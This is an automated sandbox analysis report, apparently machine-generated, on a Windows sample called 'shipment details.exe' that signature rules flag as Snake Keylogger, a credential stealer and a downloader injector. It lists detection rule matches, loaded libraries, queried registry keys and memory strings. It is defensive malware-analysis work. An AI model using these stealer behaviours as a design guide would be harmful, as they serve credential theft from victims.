Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\shipment details.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\shipment details.exe Code function: 0_2_00CFE5A4 0_2_00CFE5A4
Source: C:\Users\user\Desktop\shipment details.exe Code function: 0_2_00CFF498 0_2_00CFF498
Source: C:\Users\user\Desktop\shipment details.exe Code function: 0_2_05E08BC0 0_2_05E08BC0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_01337118 1_2_01337118
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133C147 1_2_0133C147
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133A088 1_2_0133A088
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_01335362 1_2_01335362
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133D278 1_2_0133D278
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133C468 1_2_0133C468
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133C738 1_2_0133C738
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_013369A0 1_2_013369A0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133E988 1_2_0133E988
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133CA08 1_2_0133CA08
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133CCD8 1_2_0133CCD8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133CFAA 1_2_0133CFAA
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133E97A 1_2_0133E97A
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_0133F960 1_2_0133F960
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_013339EE 1_2_013339EE
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_013329EC 1_2_013329EC
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_01333AA1 1_2_01333AA1
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_01333E09 1_2_01333E09
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD1E80 1_2_06BD1E80
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD17A0 1_2_06BD17A0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD9C70 1_2_06BD9C70
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDFC68 1_2_06BDFC68
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD9548 1_2_06BD9548
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD0B30 1_2_06BD0B30
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD5028 1_2_06BD5028
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD2968 1_2_06BD2968
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDE6B0 1_2_06BDE6B0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDE6AF 1_2_06BDE6AF
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDDE00 1_2_06BDDE00
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD1E70 1_2_06BD1E70
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD178F 1_2_06BD178F
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDEF60 1_2_06BDEF60
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDEF51 1_2_06BDEF51
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDCCA0 1_2_06BDCCA0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDCC8F 1_2_06BDCC8F
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDDDFF 1_2_06BDDDFF
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDD550 1_2_06BDD550
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDD540 1_2_06BDD540
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDEAF8 1_2_06BDEAF8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDE258 1_2_06BDE258
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDE24A 1_2_06BDE24A
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDF3B8 1_2_06BDF3B8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD8BA0 1_2_06BD8BA0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD8B91 1_2_06BD8B91
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD9BFB 1_2_06BD9BFB
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD9328 1_2_06BD9328
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD0B20 1_2_06BD0B20
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDEB08 1_2_06BDEB08
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDD0F8 1_2_06BDD0F8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDD0E8 1_2_06BDD0E8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD5018 1_2_06BD5018
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDF810 1_2_06BDF810
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD0006 1_2_06BD0006
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDF802 1_2_06BDF802
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD0040 1_2_06BD0040
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDD9A8 1_2_06BDD9A8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BDD999 1_2_06BDD999
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD295A 1_2_06BD295A
Sample file is different than original file name gathered from version info
Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe
Source: shipment details.exe, 00000000.00000000.2051525359.000000000079A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
Source: shipment details.exe, 00000000.00000002.4519226318.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs shipment details.exe
Source: shipment details.exe, 00000001.00000002.4518256105.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe
Source: shipment details.exe, 00000001.00000002.4518425391.0000000000DC7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs shipment details.exe
Source: shipment details.exe Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe
Uses 32bit PE files
Source: shipment details.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, .cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, .cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/0@4/3
Source: C:\Users\user\Desktop\shipment details.exe Mutant created: NULL
Source: shipment details.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: shipment details.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\shipment details.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: shipment details.exe, 00000001.00000002.4520239872.0000000003059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: shipment details.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"
Source: C:\Users\user\Desktop\shipment details.exe Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"
Source: C:\Users\user\Desktop\shipment details.exe Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe" Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: shipment details.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: shipment details.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp
Binary contains a suspicious time stamp
Source: shipment details.exe Static PE information: 0x93CCF654 [Thu Jul 30 00:52:36 2048 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD9233 push es; ret 1_2_06BD9244
Source: shipment details.exe Static PE information: section name: .text entropy: 7.802547137134015
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\shipment details.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
